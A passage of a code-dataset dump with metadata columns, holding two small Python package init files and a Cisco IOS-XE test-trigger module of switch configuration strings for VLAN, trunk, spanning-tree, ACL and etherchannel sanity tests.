| 5,171
| 33,473
| 3.725392
| 0.062077
| 0.071013
| 0.045266
| 0.040698
| 0.827398
| 0.785662
| 0.768169
| 0.744498
| 0.730845
| 0.716933
| 0
| 0.017717
| 0.241209
| 33,473
| 913
| 131
| 36.662651
| 0.740738
| 0.08834
| 0
| 0.709428
| 0
| 0
| 0.234441
| 0.024178
| 0
| 0
| 0
| 0
| 0.001546
| 1
| 0.026275
| false
| 0
| 0.027821
| 0
| 0.075734
| 0.474498
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
9cda2464a3fa6ecef6ca200d69be387a5db91ff2
| 130
|
py
|
Python
|
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
from fiction_segmentation.run.RunManager import _Metrics, _Epoch, _Run
from fiction_segmentation.run.RunBuilder import RunBuilder
| 43.333333
| 70
| 0.876923
| 16
| 130
| 6.8125
| 0.5625
| 0.201835
| 0.422018
| 0.477064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 130
| 2
| 71
| 65
| 0.908333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1487cb17b68704ee8d1b3e13629bd150c7e1abde
| 184
|
py
|
Python
|
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
import template_multi_level
from template_multi_level.level_1.file_1_1 import *
from template_multi_level.level_1.file_1_1 import *
from template_multi_level.level_2.file_2_1 import *
| 36.8
| 51
| 0.875
| 34
| 184
| 4.235294
| 0.235294
| 0.361111
| 0.5
| 0.458333
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0
| 0.052941
| 0.076087
| 184
| 4
| 52
| 46
| 0.794118
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 12
|
1495b17d98d78f493df3fa851d164e30bfc792b4
| 65,291
|
py
|
Python
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
# python
import copy
class TriggersConfigs():
basic_config = {
'devices': {
'uut': {
'1': {
'config': 'lldp run\n'\
'interface GigabitEthernet1/0/13\n'\
'no shutdown\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
'sleep': 300
}
},
'helper': {
'1': {
'config': 'lldp run'
}
}
}
}
basic_unconfig = {
'devices': {
'uut': {
'1': {
'config': 'no lldp run\n'\
'default interface GigabitEthernet1/0/13\n'\
'default interface vlan 1\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no vlan 2\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 2\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
}
},
'helper': {
'1': {
'config': 'no lldp run\n'\
'default vlan 1\n'\
'default interface vlan 1\n'\
'no vlan 2\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 2\n'\
'no interface vlan 10\n'\
'no interface vlan 11\n'\
'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/5\n',
}
}
}
}
switchover_ping = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'ip routing\n'\
'vlan 10\n'\
'state active\n'\
'interface vlan 10\n'\
'ip address 1.1.1.2 255.255.255.0\n'\
'no shut\n'\
'ipv6 unicast-routing\n'\
'interface GigabitEthernet2/0/15\n'\
'switchport access vlan 10\n'\
'switchport mode access\n'\
'no shut\n'\
'vlan 11\n'\
'state active\n'\
'interface vlan 11\n'\
'ip address 2.2.2.2 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet3/0/15\n'\
'switchport access vlan 11\n'\
'switchport mode access\n'\
'no shut\n'\
'do copy running-config startup-config\n'\
'do write memory',
'unconfig': 'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
'sleep': 45
}
},
'helper': {
'1': {
'config': '!\n'\
'ip routing\n'\
'!\n'\
'ip vrf vrf1\n'\
'rd 1:1\n'\
'!\n'\
'ip vrf vrf2\n'\
'rd 1:2\n'\
'!\n'\
'interface GigabitEthernet1/0/4\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'no shutdown\n'\
'!\n'\
'interface GigabitEthernet1/0/5\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf2\n'\
'ip address 2.2.2.1 255.255.255.0\n'\
'no shutdown\n'\
'ip route vrf vrf2 1.1.1.0 255.255.255.0 GigabitEthernet1/0/5 2.2.2.2\n'\
'ip route vrf vrf1 2.2.2.0 255.255.255.0 GigabitEthernet1/0/4 1.1.1.2',
'unconfig': 'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/5\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2\n'\
'no ip route vrf vrf2 1.1.1.0 255.255.255.0 GigabitEthernet1/0/5 2.2.2.2\n'\
'no ip route vrf vrf1 2.2.2.0 255.255.255.0 GigabitEthernet1/0/4 1.1.1.2',
}
}
}
}
application_sanity_base = '!enable gloabl cef for ipv4 and vrf forwarding\n'\
'ip routing\n'\
'!\n'\
'ip vrf vrf1\n'\
'rd 1:1\n'\
'!\n'\
'ip vrf vrf2\n'\
'rd 1:2\n'\
'!\n'\
'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf1\n'\
'ip address 10.0.0.1 255.255.255.0\n'\
'mac-address 0200.dead.0001\n'\
'no shut\n'\
'!\n'\
'interface GigabitEthernet1/0/2\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf2\n'\
'ip address 10.0.0.2 255.255.255.0\n'\
'mac-address 0200.dead.0002\n'\
'no shut\n'\
'!'
l2_int_up = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/15\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16',
'sleep': 30
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
}
}
}
}
SVI_L3_ping_native_VLAN = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface vlan 1\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1',
'sleep': 30
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface vlan 1\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1',
}
}
}
}
SVI_L3_ping_VLAN99 = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no interface vlan 99',
'sleep': 40
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'interface vlan 99\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface vlan 99',
}
}
}
}
trunk_config = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 60
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut\n'\
'interface loopback1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
SVI_L3_ping_VLAN99_Trunk = {
'devices': {
'uut': {
'next_hop': '18.0.1.2',
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 50
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address {next_hop} 255.255.255.0\n'\
'no shut\n'\
'interface loopback1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
IPv6_Traceroute_VLAN99_Trunk = {
'devices': {
'uut': {
'next_hop': '2001:ABAD:BEEF::2',
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ipv6 address 2001:ABAD:BEEF::1/64\n'\
'no shut\n'\
'ipv6 unicast-routing\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 50
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ipv6 address 2001:ABAD:BEEF::2/64\n'\
'no shut\n'\
'interface loopback1\n'\
'ipv6 address 3020:3020::1/64\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
stp_base_uut = 'interface GigabitEthernet1/0/15\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/16\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/17\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/1\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/2\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/3\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/4\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/7\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/8\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/9\n'\
'shutdown\n'\
'interface GigabitEthernet2/0/15\n'\
'shutdown\n'\
'interface GigabitEthernet3/0/15\n'\
'shutdown\n'\
'vlan 1-2\n'\
'no vlan 3-1000\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode pvst\n'\
'default int GigabitEthernet1/0/15\n'\
'int GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 1-2\n'\
'shut\n'\
'no shut\n'\
'int GigabitEthernet1/0/16\n'\
'shut\n'\
'default int GigabitEthernet1/0/17\n'\
'int GigabitEthernet1/0/17\n'\
'switchport mode access\n'\
'switchport access vlan 1\n'\
'shut\n'\
'no shut\n'\
'default int GigabitEthernet2/0/15\n'\
'int GigabitEthernet2/0/15\n'\
'switchport mode access\n'\
'switchport access vlan 2\n'\
'shut\n'\
'no shut'
stp_base_helper = 'ip routing\n'\
'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode pvst\n'\
'ip vrf test1\n'\
'rd 100:1\n'\
'route-target export 100:1\n'\
'route-target import 100:1\n'\
'!\n'\
'ip vrf test2\n'\
'rd 100:2\n'\
'route-target export 100:2\n'\
'route-target import 100:2\n'\
'!\n'\
'ip vrf test3\n'\
'rd 100:3\n'\
'route-target export 100:3\n'\
'route-target import 100:3\n'\
'exit\n'\
'!\n'\
'default int Vlan1\n'\
'interface Vlan1\n'\
'ip vrf forwarding test1\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'interface Vlan2\n'\
'ip vrf forwarding test1\n'\
'ip address 1.2.2.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 1-2\n'\
'no shut\n'\
'!\n'\
'interface GigabitEthernet1/0/2\n'\
'shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'no switchport\n'\
'ip vrf forwarding test2\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/4\n'\
'interface GigabitEthernet1/0/4\n'\
'no switchport\n'\
'ip vrf forwarding test3\n'\
'ip address 1.2.2.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging'
STP_root_check = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'spanning-tree vlan 1\n'\
'spanning-tree mode pvst\n'\
'default spanning-tree vlan 1 priority\n'\
'spanning-tree vlan 1 priority 0',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 60
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'spanning-tree vlan 1\n'\
'spanning-tree mode pvst\n'\
'default spanning-tree vlan 1 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no interface vlan2',
}
}
}
}
# Config/unconfig CLI sequences for the Rapid-PVST root-check STP test.
# Stage '1' applies the shared base config; stage '2' makes the UUT the
# spanning-tree root for vlans 1-2 (priority 0) and cleans up afterwards.
# 'sleep' is a post-config wait value — presumably seconds; confirm in the runner.
STP_Rapid_PVST_root_check = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority\n'\
'spanning-tree vlan 1-2 priority 0',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 60
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'no interface vlan2',
}
}
}
}
# Config/unconfig CLI sequences for the ethernet PACL (port ACL) test.
# Same two-stage layout as the STP cases: base config in stage '1',
# test-specific vlan/STP setup in stage '2', teardown in 'unconfig'.
ethernet_acl_pacl = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 50
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'no interface vlan2',
}
}
}
}
# The IP PACL permit/deny cases use the same device setup as the ethernet
# PACL test; deep copies keep the three test definitions independent.
ip_acl_pacl_permit = copy.deepcopy(ethernet_acl_pacl)
ip_acl_pacl_deny = copy.deepcopy(ethernet_acl_pacl)
# Config/unconfig CLI sequences for the routed ACL (RACL) test: an SVI
# (vlan 10) on each box, an access port between them, and a static route
# on the helper pointing at a loopback network on the UUT.
ip_acl_racl = {
'devices': {
'helper': {
'1': {
'config': \
'interface vlan 10\n'\
'ip address 20.1.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport mode access\n'\
'switchport access vlan 10\n'\
'no shut\n'\
'exit\n'\
'!\n'\
'ip routing\n'\
'ip route 1.5.1.0 255.255.255.0 20.1.1.2',
'unconfig': 'no interface vlan 10\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip route 1.5.1.0 255.255.255.0 20.1.1.2',
}
},
'uut': {
'1': {
'config': \
'interface vlan 10\n'\
'ip address 20.1.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode access\n'\
'switchport access vlan 10\n'\
'no shut\n'\
'exit\n'\
'interface loopback 10\n'\
'ip address 1.5.1.1 255.255.255.0\n'\
'no shut\n'\
'!',
'unconfig': 'no interface vlan 10\n'\
'no vlan 10\n'\
'default interface GigabitEthernet1/0/16\n'\
'no interface loopback 10',
'sleep': 40
}
}
}
}
# Config/unconfig CLI sequences for the LACP etherchannel ping test:
# helper bundles three trunk ports into Port-channel10 (LACP passive),
# UUT configures matching trunks; both sides get an SVI on vlan 11.
Etherchannel_LACP_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'interface Vlan11\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
